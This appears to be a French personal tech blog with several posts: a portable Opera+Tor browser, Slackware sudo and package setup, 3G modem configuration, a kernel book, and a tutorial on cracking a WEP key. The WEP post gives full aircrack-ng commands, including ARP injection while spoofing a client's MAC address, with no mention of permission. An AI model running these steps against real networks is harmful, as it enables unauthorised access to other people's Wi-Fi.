samedi 17 avril 2010

[Operator] Le navigateur Anonyme (Opera + Tor)

 
Operator est un navigateur web au format "portable" conçu pour surfer d'un façon anonyme. 
Il combine le navigateur Opéra, le routeur Tor  et le proxy Polipo.


- Après le téléchargement du logiciel, dé-zipper l'archive à l'emplacement de votre choix : disque dur, clé USB,et exécuté le touts simplement


Site de l'auteur et lien de téléchargement :   : : ICI : :

NB: D'âpre l'auteur les protocole anonymisé sont HTTP et HTTPS

jeudi 24 décembre 2009

Cracké une cle WEP (injection ARP)



Scénario:

-Point d'accès wi-fi (AP) protégé par une clé WEP avec un ou plusieurs clients connecté

logiciels  requis:

1- Un sniffer pour pouvoir exploré le réseau et détecté les points d'accès (AP) et les clients connecté

2-Un injecteur de pâques pour stimulé le réseau afin de récupéré un max de DATA

3-un cracker pour pouvoir déchiffré la clé wep

je vous conseille la suite Aircrack-ng  qui contient tous les outilles nécessaire [airodump-ng, aireplay-ng, aircrack-ng, airmon-ng]

ou bien vous pouvez Utilisé la distribution
BackTrack,(en live cd ou avec une clé usb)
Backtrack contient tous ce qu'il faut pour ce tutoriel

NB: je précise que j'utilise un système d'exploitation "Linux"


Notation:

MAC: adresse mac de ma carte wi-fi
BSSID : adresse MAC du point d'accée
ESSID: nom du point d'accès
Channel: le canal du point d'accès ( de 1 jusqu'à 12)

Un peut de théorie:

le WEP est un mécanisme simple de chiffrement de données, ce cryptage travaille avec l’algorithme RC4 pour chiffrer les données et utilise des clés statiques de 64 ou 128 bits

Le principe du WEP consiste à définir une clé sécrète qui doit être déclarée au niveau de chaque adaptateur sans fil du réseau (Clients) ainsi que sur le point d’accès (AP).
La clé sert à créer un nombre pseudo-aléatoire d’une longueur égale à la longueur de la trame. Chaque élément du réseau voulant communiquer entre eux doit connaître la clé secrète qui va servir au cryptage WEP. Une fois mis en place, toutes les données transmises sont obligatoirement cryptées. Il assure ainsi l’encryptage des données durant leur transfert ainsi que leurs intégrités.

pour les failles on peut cité:
- le cryptage RC4 présente des faiblesses.
- La clé de session partagée par toutes les stations est statique. Cela signifie que pour déployer un grand nombre de stations WiFi, il est nécessaire de les configurer en utilisant la même clé de session – ceci ayant pour conséquence que la connaissance de la clé est suffisante pour déchiffrer les communications.
- De plus, 24 bits de la clé servent uniquement pour l’initialisation, ce qui signifie que seuls 40 bits de la clé de 64 bits servent réellement à chiffrer et 104 bits pour la clé de 128 bits.

Pour pouvoir cracké cette clé WEP on vas:

1-sniffer le réseau pour voir les points d'acceé
2-stimulé le trafique en injectant des paquets pour récupéré le max de clé de session
3-cracké les clé de session pour avoir la clé

Pratique:

1- mètre la carte Wi-Fi en mode moniteur avec "airmon-ng":

[le mode moniteur veut dire que notre carte wi-fi vas écouté sur le réseau et récupéré les Pâques même si ils ne sont pas destiné a nous]

________________________________________
[root@darkstar dragoun]# iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wmaster0  no wireless extensions.

wlan0          IEEE 802.11bg  Mode:Managed  Frequency:2.462                        Retry min limit:7   RTS thr:of Fragment thr=2352   
__________________________________________________

Dans ce cas ma carte wi-fi est wlan0 et elle est en mode Managed

________________________________________
[root@darkstar dragoun]# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon0)
 _________________________________________________

notez que le mode moniteur est activé sur mon0, c'est parce que ma carte est une Atheros elle peut crée des carte virtuelle

on peut vérifier avec iwconfig

________________________________________
[root@darkstar dragoun]# iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0    IEEE 802.11bg  ESSID:""
             Mode:Managed  Frequency:2.412 GHz 
            Retry min limit:7   RTS thr:off   Encryption key:off
            Power Management:off
            Link Quality:0  Signal level:0  Noise level:0
            Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid
mon0    IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz                Retry min limit:7   RTS thr:off   Fragment thr=2352 B
               Encryption key:off
               Power Management:off
               Link Quality:0  Signal level:0  Noise level:0
               Rx invalid nwid:0  Rx invalid crypt:0 
________________________________________


2-Sniffer le réseau et détecté les points d'accès et les clients:

[root@darkstar dragoun]# airodump-ng mon0

qui me renvoi ce résultat





1: BSSID => adresse MAC du point d'accée
2: #DATA =>les pâques récupéré,qui vont servir a avoir la clé WEP
3: ENC => type de cryptage [ dans ce cas WEP]
4: ESSID => Nom du point d'accé
5: STATION => L'adresse MAC d'un client qui est connecté sur le point d'accès
-j'ai oublier d'encadré: CH (entre #DATA et ENC) => canal du point d'accès

maintenant qu'on a l'adresse MAC de (AP) et le canal on vas commencé a sniffé sur ce canal avec la commande suivante :

[root@darkstar dragoun]# airodump-ng -w /home/crack/crack-wep -c 1 -b 00:90:D0:DC:B1:E2 mon0

-w: le fichier ou on vas sauvegardé les pâques capturé (qui sera utilisé par aircrack-ng âpre)
-c 1 : sniffé sur le canal 1
-b: sniffer seulement les pâques émis par cette adresse MAC 00:90:D0:DC:B1:E2 (AP)
mon0: interface a utilisé

ce qui renvoi le résultat suivant



on remarque qu'on 1e minute on a récupéré 2077 #DATA

pour cracké une clé de 64 bits il nous faut minimum 10.000 data et pour une 128 bits il faut 50.000 data, ou plus

dans ce cas on ne connais pas le type de la clé, supposant qu'elle soit une 128 bits

3- Injecter des paquet:

afin d'avoir nos 50.000 DATA rapidement on vas encore stimulé le réseau en envoyant des pâques ARP a l'AP en utilisant l'adresse MAC du client connecté comme adresse source (spoofé l'adresse MAC du client)


[root@darkstar dragoun]# aireplay-ng -3  -e SpeedTouch345B2D -a  00:90:D0:DC:B1:E2  -h 00:19:7E:01:A3:70 mon0


- 3 : pour dire qu'il faut injecter des pâques ARP
- e : nom du point d'accés
- a : adresse MAC du point d'accès
- h : adresse MAC du client (pour faire croire que les pâques viennent de lui)
mon0: interface wi-fi


- Apré 15 minutes on remarque qu'on a récupéré 56.689 DATA ce qui  suffit même pour une clé 128 bits




4- cracké les paquets:

 on récupéré le fichier enregistré avec airodump-ng et on en le crack avec aircrack-ng

[root@darkstar dragoun]# aircrack-ng /home/crack/crack-wep-01.cap -b 00:90:D0:DC:B1:E2

crack-wep-01.cap : fichier sur le quele on a sauvegardé les
                   pâques avec airodump-ng

-b: adresse de AP



KEY FOUND!===> en ASCII sa donne :"aabbccddeeff1"



mardi 20 octobre 2009

Gestionnaire de paquet pour Gnu/Linux Slackware


Pour installer des logiciels sur Gnu/Linux Ubuntu [Debian] on utilise "apt-get" ou bien le gestionnaire graphique (installer par défaut)...
Voici un équivalent pour Gnu/Linux Slackware :
"slapt-get" (en ligne de commande ) ou bien "Gslapt" (gestionnaire graphique)

::Telecharger Slapt-Get et Gslapt::

Ps: après l'installation vous trouvez Gslapt dans "K==>Système==>Gestionnaire de paquet Gslapt"

vendredi 16 octobre 2009

Ajouter un utilisateur au "sudoer" sur Gnu/Linux Slackware














j'ai remarque qu'a pré l'installation de "Gnu/Linux Slackware" il n'y avais que le compte 'root' et le système se log automatiquement sur ce compte.. alors l'idéal est de crée un utilisateur simple mais qui peut avoir les droit "root" si nécessaire en utilisant "sudo"

1- crée un utilisateur


il faut se logé en autan que 'root' et tapez cette commande:
root#: adduser nom_d'utilisateur

2- Ajouter l'utilisateur au groupes

en gros il y'a des groupes et l'utilisateur doit en faire partie pour pouvoir accédé au fonction de
chaque groupe, on vas ajouté l'utilisateur qu'on a crée a ces groupes:
"
cdrom, audio, video, scanner,wheel,plugdev et power".
pour sa il y a plusieurs méthodes,
par exemple on utilisant la commande
root# gpasswd -a nom_d'utilisateur nom_du_groupe
Exempl: root$ gpasswd -a tifo plugdev
cette ligne vas ajouté l'utilisateur tifo au groupe plugdev

ou bien on vas édité manuellement le fichier "/etc/groupe" et ajouter l'utilisateur a chaque groupe
root# nano /etc/group
et on ajouter le nom du nouveau utilisateur comme indiqué
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:!:10:root,nom_d'utilisateur
floppy:x:11:root,nom_d'utilisateur
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root,nom_d'utilisateur
video:x:18:root,nom_d'utilisateur
cdrom:x:19:root,nom_d'utilisateur
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root,nom_d'utilisateur
power:x:84:root,nom_d'utilisateur
.
....
3-Ajouter l'utilisateur dans "/etc/sudoers"

cela vas permettre a l'utilisateur d'exécuter les commande destiné qu'au "root"
root# nano /etc/sudoers
repérez cette ligne :
# Uncomment to allow people in group wheel to run all commands
# %wheel ALL=(ALL) ALL

et décomentez la ce qui donne sa:
# Uncomment to allow people in group wheel to run all commands
%wheel ALL=(ALL) ALL

Redémarrez et logé vous avec le nouveau utilisateur

une fois qu'on a crée notre utilisateur et on l'a ajouté au différents groupes pour pouvoir exécuté des commandes 'root' en utilisant 'sudo'.
tout fois il reste un tous petit problème a réglé.
si vous asseyez d'exécuter la commande 'reboot' par exemple ou bien 'lsusb' vous aurez une erreur qui dit que cette commande n'existe pas... :/
en fét pour exécuté 'reboot' vous devez taper ceci
utilisateur$ sudo /sbin/reboot
et pas seulment que pour 'reboot' mais pour tous les commande du 'root' vous deviez spécifier le chemin complet de la commande se qui n'est pas pratique.
pour remédier a ça on doit ajouté 2 fichier .bashrc et bash_profile

4- Creé .bashrc et .bash_profile


sur Slackware les fichiers ".bashrc" et ".bash_profile" n'existe pas par défaut alors on vas les crée dans votre repertoir personnel: "/home/nom_d'utilisateur/.bash_profile"
si votre nom d'utilisateur est tifo (a titre d'exemple)
alors sa sera :
utilisateur$ sudo nano /home/tifo/.bash_profile
copier /colle ce code sur le fichier et enregistré le
_______________________
# .bash_profile

# Source .bashrc
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
_______________________

maintenant on vas crée le ".bashrc
" toujour dans /home/tifo/.bashrc qui vas contenir:

$PATH: c'est ce qu'on appelle les variables d'environnements qui vont nous permettre de trouvé les commandes (pour évité d'écrire a chaque foi '/sbin/reboot' par exemple)
$PS1: c'est l'invite de commande. Exemple: [tifo:~]$
Les alias: c'est une sorte de raccourcie qu'on crée, par exemple au lieu d'écrire a chaque fois 'clear' on lui met une alias cls='clear' et rien qu'on tapant cls alors clear sera exécuté

utilisateur$ sudo nano /home/tifo/.bashrc

et copier/coller ce code:
_______________________
#.bashrc

# Le chemain
export PATH="$PATH:$HOME/bin:/sbin:/usr/sbin/:/usr/bin"

# Dynamic resizing
shopt -s checkwinsize

# custom prompt
PS1="\[\e[36;1m\][\u:\w]$ \[\e[0m\]"

# Les alias
alias l='ls'
alias la='ls -a'
alias lal='ls -al'
alias ll='ls -l'
alias lsd='ls -d */'
#pour étre sure
alias rm='rm -i'
alias mv='mv -i'
alias cp='cp -i'
________________________

une dernier chose, il faut crée .bashrc dans le dossier /root/ aussi

utilisateur$ sudo nano /root/.bashrc


Copier/coller

________________________
#/root/.bashrc

#resize text
shopt -s checkwinsize

#custom prompt
PS1="\[\e[35;1m\][\u@\h \W]# \[\e[0m\]"

# Les alias
alias l='ls'
alias la='ls -a'
alias lal='ls -al'
alias ll='ls -l'
alias lsd='ls -d */'
#pour étre sure
alias rm='rm -i'
alias mv='mv -i'
alias cp='cp -i'
________________________

j'espère que j'ai rien oublier :P
vos commentaire, vos correction, vos proposition sont les bienvenue :)

mardi 13 octobre 2009

MobiConnect sur Gnu/Linux (KDE)

Voici un petit tuto sur comment configuré la clé internet "Mobiconnect" sur un system Gnu/Linux 'KDE' [tester sur "Slackware 12.2"]

on a besoin du logiciel "KPPP", si vous ne le trouvez pas dans 'K==>Internet==>KPPP'

vous pouvez le télecharger librement et gratuitment
:: Telecharger KPPP::
____

#executé KPPP







# Dans l'ongle "Comptes" selectioné
"Nouveau==>Configuration de l'appele"














#Editez l'ongle "numerotation" comme le mentre l'image
-lessez les autre ongles avec les valeurs par defaut
(Clické pour agrendiqre)













# pour la configuration du modem selectionez l'ongle
"modem"
en suit "Nouveau"

















# dans l'ongle "périphérique"
metez les valeurs comme le montre l'image:

















#Dans l'ongle "modem" verifier les "commandes du modem"


















#Si les commandes ne sont pas définit, definissez les telle que le mentre
l'image (Clické pour agrendiqre)

.

















# le nom d'utilisateur et le mots de passe: " internet"







# Etat et details de connections

vendredi 9 octobre 2009

Linux Kernel in a Nutshell


C'est un livre écrit par un des principaux développeurs du noyau Linux (Greg Kroah-Hartman), publié par O'Reilly. Ce livre donne une vue d'ensemble complète sur la configuration du noyau et la compilation. Il se base sur le noyau 2.6.18.

Il est assez concis, car Il est rédigé comme une référence rapide.

Le livre est disponible en téléchargement gratuit
langue du livre : anglais

Page web du livre et de téléchargement : > ICI <

wibiya widget